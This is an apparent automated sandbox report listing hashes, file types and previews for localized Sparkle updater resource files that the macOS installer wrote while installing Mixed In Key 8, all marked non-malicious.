                                                                                                    SHA-256:9BC86FBDDDDBCA9170DEBA76A5C886BFB37CB8BE68E5EC49738DA81C557E7654
                                                                                                    SHA-512:142329D8328E496746A83D053123EBE7DC292F6F788C778BA1869F5D2EFF877999EACD5D00A420A86F7E0A0E2A4B9997306D9600CACFF3E5DD65DC46A9D2D2F5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_ObEqX8
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12099
                                                                                                    Entropy (8bit):6.7409499727549615
                                                                                                    Encrypted:false
                                                                                                    MD5:B424A518FA33A5825EA21FAE09D125E3
                                                                                                    SHA1:F777CF80A84567E768A35049672C7ED5EB88E575
                                                                                                    SHA-256:BAE4445AC8ED836D457C8154C971EF4A33A450305C72D359BE9E63997EBDF09B
                                                                                                    SHA-512:EF169109DD9C9EFBACFBE30AF8C8E1B14B083FB79482C51E4991FDD8C08E8079AEA2FC0B2B7D62C46E7305F212EE89A8DDACE25675B7D13BF388AD489FC58362
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_YEERAI
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7258
                                                                                                    Entropy (8bit):3.3997309241312994
                                                                                                    Encrypted:false
                                                                                                    MD5:537F612AC0974A57B8F57D5A4B189801
                                                                                                    SHA1:FC8C025848DA6ECF7E5CF0B69299D5601708B005
                                                                                                    SHA-256:0820D6181FE5D2BD0FDCAE86BDC14C850E24B115ECAC991FF1F9E53E2BE5A745
                                                                                                    SHA-512:A9AE641243EE255204542624E89B693F8E685F7351EE0AC1D1FA75ECB75A7180416AC260C18549C3EFB9E8DCB03058F3CA9D4433D7FE9832982AEA7E86F28336
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .e.r. .h.e.n.t.e.t. .o.g. .k.l.a.r. .t.i.l. .b.r.u.g.!. .V.i.l. .d.u. .i.n.s.t.a.l.l.e.r.e. .o.g. .g.e.n.s.t.a.r.t.e. .%.1.$.@. .n.u.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .i.k.k.e. .o.p.d.a.t.e.r.e.s. .n...r. .d.e.t. .k...r.e.s. .f.r.a. .e.n. .k.u.n. .l...s.b.a.r. .e.n.h.e.d... .F.l.y.t. .%.1.$.@. .t.i.l. .m.a.p.p.e.n. .P.r.o.g.r.a.m.m.e.r.,. .g.e.n.s.t.a.r.t. .d.e.r.f.r.a. .o.g. .p.r...v. .i.g.e.n.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/da.lproj/.BC.T_vDNjsO
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18288
                                                                                                    Entropy (8bit):6.830310630492426
                                                                                                    Encrypted:false
                                                                                                    MD5:D942DF17DBFE9994B2FF40D113F4DD30
                                                                                                    SHA1:4398DFD10E7D52C78E9F5659B70DEB6E19C32D23
                                                                                                    SHA-256:89B90C9410059800D38C02971DDA34251461206810E6419E19038FF19BBEC997
                                                                                                    SHA-512:CDD5F011ABEA2F54B3509794DED0ACCB6DADD739629374B872DB34F6B798794D3D88CF0E3246EA5A9547D1EFE0C87645780CE3A217A799F84671034CBA246E93
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_7BHn1J
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7298
                                                                                                    Entropy (8bit):3.4090905037860706
                                                                                                    Encrypted:false
                                                                                                    MD5:4F97FF9E89D2E8AD43F65514CFA603CD
                                                                                                    SHA1:42D5F197D583C33555C57AD2BC4718C738189E9F
                                                                                                    SHA-256:A97167AD065580BD61930C65CE47278E17C331B19CF035E3B94BD9ED56BEE173
                                                                                                    SHA-512:350CE251B878E3FDF01797E6EC1594E44E0483FA4D0475494D0DEE5565DF7317280B792AD0C861D26C0E6FABF45F6DC466DD72527A7146BD99788DEC7793CA4E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .w.u.r.d.e. .h.e.r.u.n.t.e.r.g.e.l.a.d.e.n. .u.n.d. .s.t.e.h.t. .z.u.r. .V.e.r.w.e.n.d.u.n.g. .b.e.r.e.i.t.!. .M...c.h.t.e.n. .S.i.e. .%.1.$.@. .j.e.t.z.t. .d.u.r.c.h. .d.i.e. .n.e.u.e. .V.e.r.s.i.o.n. .e.r.s.e.t.z.e.n. .u.n.d. .n.e.u. .s.t.a.r.t.e.n.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n.n. .n.i.c.h.t. .a.k.t.u.a.l.i.s.i.e.r.t. .w.e.r.d.e.n.,. .w.e.n.n. .e.s. .v.o.n. .e.i.n.e.m. .V.o.l.u.m.e.n. .o.h.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_G3KZrH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12137
                                                                                                    Entropy (8bit):6.74003869249438
                                                                                                    Encrypted:false
                                                                                                    MD5:6662F3551389B0A978D44E0B6509D6B8
                                                                                                    SHA1:DBEB2A41E270DC7FCB2D698EA40D9D090A063A46
                                                                                                    SHA-256:CC1B0DEAC66D802D80DB34C9CCB1647697E218B5BFD24D19ABB280BA0F5861E3
                                                                                                    SHA-512:F6AA35C3C20A0584D894261D3391635CA0578C2319D7DEB375B270F83041168E2520D223B4EA35A055B1A4D699464E63B41726AB3A2F71F18639A05A275B9497
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_eBgZ8M
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18446
                                                                                                    Entropy (8bit):6.789743135390899
                                                                                                    Encrypted:false
                                                                                                    MD5:0D760E3D8E8D763EEBFD462A4B1ADDB0
                                                                                                    SHA1:EB91B69C1FAF8BB9C7CAEC56AA3DC3BB614237CE
                                                                                                    SHA-256:02CFF0F4C9C19207B50E73F7EAF8F7A51E6883B511F17A04D1DD98335C5DF790
                                                                                                    SHA-512:845347571F442F28B103CFC4B9168B96BAECB4BD8D26B526F1706767F094C0B82714EC9B1CF5908B4A92B449041DC0B140194A25C4ADFAAE67DDC5C875772770
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/de.lproj/.BC.T_zi6jWE
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15618
                                                                                                    Entropy (8bit):6.808664356724031
                                                                                                    Encrypted:false
                                                                                                    MD5:F614CD0AB3FCB374A67975A58889F383
                                                                                                    SHA1:EF77C856A2307879CA1F54821031F931AA0358D4
                                                                                                    SHA-256:DFE265B45917A2A442BCF8850814838761E18EF9BF449DE0612C16E2120D585E
                                                                                                    SHA-512:3D529EAE731763EA0FDE991093275B7FCE3CAACD5519C63D8CE7FA5919EDE60AFBADB9F9F9E5F9245C576E8D97B3687F6C677C8FD933B7BAFF3E545CE1B8F76B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_BTW4FZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11174
                                                                                                    Entropy (8bit):6.729033238051354
                                                                                                    Encrypted:false
                                                                                                    MD5:EAE97FF0847C9901F4B8ECD0B27DD9C6
                                                                                                    SHA1:C18AF788CFA2FE4DB046B78607993E1AD70A3141
                                                                                                    SHA-256:C5B50EE11D81C566FD9766853BAACA3F07A5DACC3B2C40EA0EC731A1E74D946E
                                                                                                    SHA-512:9C871591E9306BF2F889C678CD39DBBE21DEA61AC420E6350910AE54935FEC4FEF06DCDE766D5D6279975D9734BCDE783282690456B7FEC111202348C97EF665
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_ExBD6E
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15750
                                                                                                    Entropy (8bit):6.811351000969998
                                                                                                    Encrypted:false
                                                                                                    MD5:80AB259DEB0C33A799C1E71D4F6EC454
                                                                                                    SHA1:767A5BD85321A38DFCC6427E7A1994D52ED9CC93
                                                                                                    SHA-256:C011F2F25471FBEAFC23C38C1F8CFD98791EF00FC14D3F218438D6E65E141029
                                                                                                    SHA-512:422183DA0C0C4ECB247075E0DAA617FF7F698CC980E4721C426034EC437360DAD3D44940B7BA3B1A94EC60C1ABB44AD1CAD0EE73A72860F63F9BF526B5139FBD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_Inf0xe
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):8226
                                                                                                    Entropy (8bit):3.3874847820358407
                                                                                                    Encrypted:false
                                                                                                    MD5:04549C0E76D397177FBDD2CCEE2DFF79
                                                                                                    SHA1:CF3324F5FBC63CC9CD5005D757FFA39D8267CE21
                                                                                                    SHA-256:3077FA2F5371455C3386B72F481A055B3705901F74B896AA50BC4661D149D268
                                                                                                    SHA-512:2CD126E1C23D5D579B8DC907D0235785DF09D8F4CC0AA0A927BE7540F78A82328016D26D99E1123A462C07676128D5720096A63C6D7BBC93D6ACB17881E4A597
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .T.h.i.s. .i.s. .a.n. .i.m.p.o.r.t.a.n.t. .u.p.d.a.t.e.;. .w.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .T.h.i.s. .i.s. .a.n. .i.m.p.o.r.t.a.n.t. .u.p.d.a.t.e.;. .w.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;.....".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_ReykOw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18219
                                                                                                    Entropy (8bit):6.836115477561288
                                                                                                    Encrypted:false
                                                                                                    MD5:D06B1FFE30C501D384D1BCFF3C87DFAB
                                                                                                    SHA1:BC5EA11BBE0145A1E71E1040D287749EB62F8148
                                                                                                    SHA-256:950E5F954554EED5129016CE224D9740665F30702CBAD50D3AB330D2D4B22F08
                                                                                                    SHA-512:0C1C9B1A27D748192ECE95622191B203A762DFA71908DFCD1C52856D7DA900AF14BA9EB8667F8A5EFA3F2DDFD5F2FB28F58ECC1DFD0A30258DFBAAFC4A5F66C2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/en.lproj/.BC.T_f55ZHH
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12096
                                                                                                    Entropy (8bit):6.741398255604073
                                                                                                    Encrypted:false
                                                                                                    MD5:3E74B9207E67587FBD9A7480CFD95E74
                                                                                                    SHA1:0A5D7BA37D0CDE8946CE67678FDF1B1E2E8C62A2
                                                                                                    SHA-256:B811A81BEC13AFEB6D6582DD77DAD20C48A70B262B731758E1BDC500AD5AA88F
                                                                                                    SHA-512:E50BABE8CCD6050FC4A59A461F59806093A4B4573E739C564CB77ED7F4B6AED0C117CF72BB597B2C1425C0D2689EE1940DB710AF85CE942F230470B3FEE3919D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_HEODBC
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18619
                                                                                                    Entropy (8bit):6.769075849014705
                                                                                                    Encrypted:false
                                                                                                    MD5:B72919A225060C23A6F1FD9BC53099F6
                                                                                                    SHA1:E896D6FB46DB8E785D75484068C92FBC9F4E6400
                                                                                                    SHA-256:80DA82AC2B9E1C09BEFD5A1D9B9275D11EE9403B546BABBF7A2B8CD7F045189E
                                                                                                    SHA-512:610ECC1A28A215ED5DF46DF0C4EFCB0E5F7CC8B97C495F27D619B06C37E7580106C07A7FC9D847C583FBECB7A32D6C3AEC148189962AE87D649533D5EEE39EEC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
